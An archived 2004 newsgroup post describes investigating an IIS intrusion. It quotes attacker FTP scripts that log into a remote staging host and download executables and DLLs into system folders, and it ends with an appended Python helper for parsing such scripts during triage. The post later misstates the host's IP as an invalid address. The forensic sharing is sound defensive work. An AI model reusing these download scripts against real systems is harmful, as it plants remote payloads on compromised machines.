Re: Russian IIS hack? Malicious Javascript code
From: LPD (mcnutt_at_lcti.net)
Date: 06/25/04
- Next message: Ed Hansberry, MS-MVP/Mobile Devices: "Re: Russian IIS hack? Malicious Javascript code"
- Previous message: Damian: "Re: Russian IIS hack? Malicious Javascript code"
- In reply to: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Next in thread: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 25 Jun 2004 08:13:55 -0700
The MS04-011 patch WAS NOT INSTALLED at the time of the intrusion. I
had indeed pushed it down with SUS, but the install had failed due
to the relatively large amount of disk space the patch requires to
install.
Found the files you mentioned on my box. Also found another file with
a timestamp that was a minute later than agent.exe and ftpcmd.txt.
The file is a VBScript file called ads.vbs. I think that's the code they
used to modify IIS. I'd post the code, but it's 32k in size - a little
much for a usenet posting.
Found something else: a hidden folder in the root of the OS partition
called X, dated 5/17/2004. Inside there is a log file, x.txt. This
is what it contains:
open 219.195.24.60 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye
291.195.24.60 is a Japanese web server run by Softbank. Probably a
staging point.
I checked to see if the files in the txt file were there. Found the
data folder and a temp folder inside that, and a zero-byte empty file,
shellhost32.exe. Either a failed attempt to upload a rootkit or a
test run, I'm thinking.
"Ron Guyor" <rong@youngsinc.com> wrote in message news:<O01$lggWEHA.2544@TK2MSFTNGP10.phx.gbl>...
> I just found some files from the 23rd in my system32 directory. They are
> ftpcmd.txt and agent.exe. The ftpcmd.txt file has this:
> ---
> binary
> get agent.exe
> bye
> ---
>
> That could be where it's coming from.
>
> Ron
>
>
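The two FTP scripts quoted in this thread (x.txt above and Ron's ftpcmd.txt) are the kind of artifact worth pulling indicators from during triage. The following is an added example, not code from either poster: it parses a dropped FTP command script of that shape (an optional `open HOST [PORT]`, `USER name` with the password on the next line, `binary`, and `GET remote [local]` lines) and returns the staging host, port, credentials and every local destination path so they can be checked on disk. The sample script embedded below is constructed from the x.txt contents quoted in the post.

```python
"""Triage helper: extract indicators from a dropped FTP command script."""

# Constructed sample, taken from the x.txt contents quoted in the post above.
SAMPLE_X_TXT = """open 219.195.24.60 33333
USER hack
hack
GET shellhost32.exe c:\\winnt\\system32\\inetsrv\\data\\shellhost32.exe
GET filter.dll c:\\winnt\\system32\\inetsrv\\data\\filter.dll
bye
"""


def parse_ftp_script(text):
    """Return a dict of indicators found in an FTP command script."""
    info = {"host": None, "port": 21, "user": None, "password": None,
            "binary": False, "transfers": []}
    expect_password = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_password:
            # The line following USER is the password the script feeds to the prompt
            info["password"] = line
            expect_password = False
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                info["port"] = int(parts[2])  # non-standard port is itself an indicator
        elif cmd == "user" and len(parts) >= 2:
            info["user"] = parts[1]
            expect_password = True
        elif cmd in ("binary", "bin"):
            info["binary"] = True
        elif cmd in ("get", "recv") and len(parts) >= 2:
            remote = parts[1]
            # With no local path the FTP client writes the file into its working dir
            local = parts[2] if len(parts) >= 3 else remote
            info["transfers"].append((remote, local))
    return info


def dropped_paths(info):
    """Local destinations to check for existence, size (zero-byte?) and timestamps."""
    return [local for _, local in info["transfers"]]
```

Feed each path from `dropped_paths()` to your file-system and timeline checks; a zero-byte destination, as with shellhost32.exe here, points to a transfer that never completed.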